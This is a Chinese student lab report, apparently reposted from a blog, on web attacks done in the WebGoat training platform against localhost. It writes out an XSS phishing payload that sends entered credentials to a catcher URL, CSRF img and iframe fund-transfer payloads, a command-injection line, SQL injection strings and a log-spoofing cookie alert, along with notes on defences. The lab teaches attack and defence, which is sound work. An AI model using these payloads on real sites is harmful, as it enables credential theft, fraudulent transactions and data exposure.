做网站自己,长沙网站开发设计,网站制作需求分析,网站后台不能粘贴2018-2019 20165226 Exp9 Web安全基础 目录 一、实验内容说明及基础问题回答 二、实验过程 Webgoat准备XSS攻击 ① Phishing with XSS 跨站脚本钓鱼攻击② Stored XSS Attacks 存储型XSS攻击③ Reflected XSS Attacks 反射型XSS攻击 CSRF攻击 ① Cross Site Request Forgery(CS…2018-2019 20165226 Exp9 Web安全基础 目录 一、实验内容说明及基础问题回答 二、实验过程 Webgoat准备XSS攻击 ① Phishing with XSS 跨站脚本钓鱼攻击② Stored XSS Attacks 存储型XSS攻击③ Reflected XSS Attacks 反射型XSS攻击 CSRF攻击 ① Cross Site Request Forgery(CSRF)② CSRF Prompt By-Pass SQL注入攻击 ① Command Injection 命令注入 ② Numeric SQL Injection ③ Log Spoofing 日志欺骗 ④ String SQL Injection 字符串型注入 ⑤ LAB:SQL Injection 三、问题与思考 四、实验总结 一、实验内容说明及基础问题回答 1、实验内容 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。 2、基础问题回答 1SQL注入攻击原理如何防御 原理: 通过在用户名、密码登输入框中输入一些,--,#等特殊字符实现引号闭合、注释部分SQL语句利用永真式实现登录、显示信息等目的。其实就是输入框中的字符提交到后台的数据库中会与SQL语句组合拼接针对程序员编程时的疏忽通过SQL语句实现无帐号登录甚至篡改数据库。防御办法 使用正则表达式过滤传入的参数;检查是否包函非法字符,在后台控制输入的长度或者禁止用户输入一些特殊符号例如 -- 、 等摒弃动态SQL语句而改用用户存储过程来访问和操作数据。这需要在建立数据库后仔细考虑Web程序需要对数据库进行的各种操作并为之建立存储过程然后让Web程序调用存储过程来完成数据库操作。2XSS攻击的原理如何防御 原理 攻击者往Web页面里插入恶意html标签或者javascript代码当用户浏览该页或者进行某些操作时攻击者利用用户对原网站的信任诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。防御办法 当恶意代码值被作为某一标签的内容显示在不需要html输入的地方对html 标签及一些特殊字符( ” 等等 )做过滤将其转化为不被浏览器解释执行的字符。当恶意代码被作为某一标签的属性显示通过用 “将属性截断来开辟新的属性或恶意方法属性本身存在的 单引号和双引号都需要进行转码对用户输入的html 标签及标签属性做白名单过滤也可以对一些存在漏洞的标签和属性进行专门过滤。3CSRF攻击原理如何防御 原理 CSRF就是冒名登录。跨站请求伪造的核心本质是窃取用户的Session,或者说Cookie,因为目前主流情况 Session都是存在Cookie中.攻击者并不关心被害者具体帐号和密码,因为一旦用户进行了登录,Session就是用户的唯一凭证,只要攻击者能够得到Session,就可以伪装成被害者进入服务器.主要是当访问网站A时输入用户名和密码在通过验证后网站A产生Cookie信息并返回此时登录网站A成功可正常发送请求到网站A。在未退出网站A前若访问另一个网站B网站B可返回一些攻击性代码并请求访问网站A因此在网站B的请求下向网站A发出请求。但网站A不知道该请求恶意的因此还是会执行该恶意代码防御办法 通过 referer、token 或者 验证码 来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作 。避免全站通用的cookie严格设置cookie的域。返回目录 二、实验过程 WebGoat准备 介绍WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上当前提供的训练课程有30多个其中包括跨站点脚本攻击XSS、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。WebGoat提供了一系列web安全学习的教程某些课程也给出了视频演示指导用户利用这些漏洞进行攻击。下载webgoat-container-7.0.1-war-exec.jar文件在含有该文件的目录下使用命令java -jar webgoat-container-7.0.1-war-exec.jar运行Webgoat出现信息: Starting ProtocolHandler [http-bio-8080]说明开启成功可以看到占用8080端口实验过程中不能关闭终端 在浏览器中输入http://localhost:8080/WebGoat进入WebGoat登录界面,直接用默认用户名密码登录即可 XSS攻击 跨站脚本攻击是通过HTML注入劫持用户的浏览器任意构造用户当前浏览的HTML内容可以模拟用户当前的操作。这里实验的是一种获取用户名和密码的攻击。 ① Phishing with XSS 跨站脚本钓鱼攻击 在webgoat找到Cross-Site Scripting xss攻击打开第一个——Phishing with XSS将下面这段代码输入到Search:输入框中点击searchhead body div div stylefloat:left;height:100px;width:50%;background-color:yellow;/div div stylefloat:left;height:100px;width:50%;background-color:orange;/div /div div stylebackground-color:grey;height:200px;clear:both;/div /div/div /form script function hack(){ XSSImagenew Image; XSSImage.srchttp://localhost:8080/WebGoat/catcher?PROPERTYyesuser document.phish.user.value password document.phish.pass.value ; alert(attack.ï¼ÂÂï¼ÂÂï¼ÂÂï¼ÂÂï¼ÂÂï¼ Your credentials were just stolen. User Name document.phish.user.value Password document.phish.pass.value); } /script form namephish br br HR H2This feature requires account login:/H2 br brEnter Username:br input typetext nameuser brEnter Password:br input typepassword name pass br input typesubmit namelogin valuelogin onclickhack() /form br br HR /body /head 结果会出现代码中所指定的黄、橙、灰三块div并在下方出现了用于欺骗用户的提示语“This feature requires account login:”和用户名、密码输入框。 如果真的在登录框中输入用户名、密码eg:20165226 123456点击登录后会像代码中alert提示的显示被窃取的用户名和密码。 ② Stored XSS Attacks 存储型XSS攻击 存储型XSS的攻击基本流程: 1、比如在某个论坛提供留言板功能黑客在留言板内插入恶意的html或者Javascript代码并且提交。 2、网站后台程序将留言内容存储在数据中 3、然后一个用户也访问这个论坛并刷新了留言板这时网站后台从数据库中读取了之前黑客的留言内容并且直接插入在html页面中这就可能导致黑客留言的脚本本身应该作为内容显示在留言板的但此时黑客的留言脚本被浏览器解释执行。 黑客的脚本可以用来做如下所述的攻击: 1.通过javascript获取用户的cookie根据这个cookie窃取用户信息 2.重定向网站到一个钓鱼网站 3.重新更改页面内容假装让客户输入用户名密码然后提交到黑客的服务器 打开Cross-Site Scripting xss攻击中的第二个Stored XSS Attacks在Message框中输入上面那段代码,并点击submitTitle随便输入提交后下方Message List中会新增刚输入的Tile名字的链接点击链接。可以看到我们的html已经注入成功messege部分显示的是三色框在下方用户名密码处输入eg:20165226 123456点击提交后被成功获取用户名和密码 ③ Reflected XSS Attacks 反射型XSS攻击 反射型XSS 我们在访问一个网页的时候在URL后面加上参数服务器根据请求的参数值构造不同的HTML返回。 value可能出现在返回的HTML(可能是JS,HTML某元素的内容或者属性)中, 如果将value改成可以在浏览器中被解释执行的东西,就形成了反射型XSS. 别人可能修改这个value值然后将这个恶意的URL发送给你,当URL地址被打开时, 特有的恶意代码参数就会被HTML解析执行. 它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 存储型XSS与反射型XSS的区别 ①存储型XSS持久化代码是存储在服务器中的如在个人信息或发表文章等地方加入代码如果没有过滤或过滤不严那么这些代码将储存到服务器中用户访问该页面的时候触发代码执行。这种XSS比较危险容易造成蠕虫盗窃cookie等。 ②反射型XSS非持久化需要欺骗用户自己去点击链接才能触发XSS代码服务器中没有这样的页面和内容一般容易出现在搜索页面。 打开xss的第三个攻击Reflected XSS Attacks在“Enter your three digit access code:”中输入点击Purchase成功显示警告框内容为我们script脚本指定的内容 CSRF攻击 跨站请求伪造尽管听起来像跨站脚本XSS但它与XSS非常不同XSS利用站点内的信任用户而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比CSRF攻击往往不大流行因此对其进行防范的资源也相当稀少和难以防范所以被认为比XSS更具危险性。 ① Cross Site Request Forgery(CSRF) 打开Cross-Site Scripting xss攻击中的第四个Cross Site Request Forgery(CSRF)查看页面下方Parameters中的src和menu值分别为293和900在message框中输入img srchttp://localhost:8080/WebGoat/attack?Screen293menu900transferFunds5000 width1 height1 / 以图片的的形式将URL放进Message框这时的URL对其他用户是不可见的用户一旦点击图片就会触发一个CSRF事件点击Submit提交 - 这里src值、menu值要根据上一步查看的结果修改转账数额随便输入eg:5000 - 宽高设置成1像素的目的是隐藏该图片 提交后在Message List中生成以Title命名的链接消息。点击该消息当前页面就会下载这个消息并显示出来转走用户的5000元从而达到CSRF攻击的目的。 ② CSRF Prompt By-Pass 打开Cross-Site Scripting xss攻击中的第五个CSRF Prompt By-Pass同攻击4查看页面下侧Parameters中的src和menu值323和900在title框中输入学号message框中输入代码iframe srcattack?Screen323menu900transferFunds6000 /iframe
iframe srcattack?Screen323menu900transferFundsCONFIRM /iframe 在Message List中生成以Title命名的链接20165226。点击进入后如图攻击成功 SQL注入攻击 SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐相当大一部分程序员在编写代码的时候没有对用户输入数据的合法性进行判断使应用程序存在安全隐患。用户可以提交一段数据库查询代码根据程序返回的结果获得某些他想得知的数据这就是所谓的SQL Injection即SQL注入。 ① Command Injection 命令注入 右键点击页面选择inspect Element审查网页元素对源代码进行修改在复选框中任意一栏的代码后添加 netstat -an ipconfig点击view能看到网络端口使用情况和 IP 地址攻击成功 ② Numeric SQL Injection 显示所有城市的天气情况 右键点击页面选择inspect Element审查网页元素对源代码进行修改在选中的城市编号Value值中添加or 11攻击成功显示所有城市的天气情况 ③ Log Spoofing 日志欺骗 通过查看下方灰色区域我们分析它代表在 Web 服务器的日志中的记录的内容。 目的使用户名为“admin” 的用户在日志中显示“成功登录”。 方法通过在日志文件中插入脚本实现。 在username中填入 5226%0d%0aLogin Succeeded for username: admin利用回车(0D%)和换行符(%0A)让其在日志中两行显示点击Login可见5226在Login Fail那行显示我们自己添加的语句在下一行显示可以向日志文件中添加恶意脚本脚本的返回信息管理员能够通过浏览器看到。用户名输入admin scriptalert(document.cookie)/script管理员可以看到弹窗的cookie信息。 ④ String SQL Injection 字符串型注入 目的尝试通过 SQL 注入将所有信用卡信息显示出来。 方法基于以下查询语句构造自己的 SQL 注入字符串。SELECT * FROM user_data WHERE last_name ?。 选择Injection Flaws中的String SQL Injection输入查询的用户名lxs or 11-- 如此lxs 和11都成了查询的条件而11是恒等式这样就能select表里面的所有数据。 ⑤ LAB:SQL Injection 将密码长度maxlength改为200在密码框输入 or 11 --返回目录 三、问题与思考 下载jar包后运行中主目录中没有所需的攻击列表卸载重装然后重启了n次还是这个界面无解分析电脑jdk版本和 这个jar的jdk版本不同解决方案换了虚拟机然后OK返回目录 四、实验总结 通过本次实验学习了使用WebGoat工具进行SQL注入攻击、XSS攻击、CSRF攻击主要攻击方法便是利用语句漏洞。总体挺有意思对SQL语句格式有了更深掌握。返回目录转载于:https://www.cnblogs.com/musea/p/10894338.html
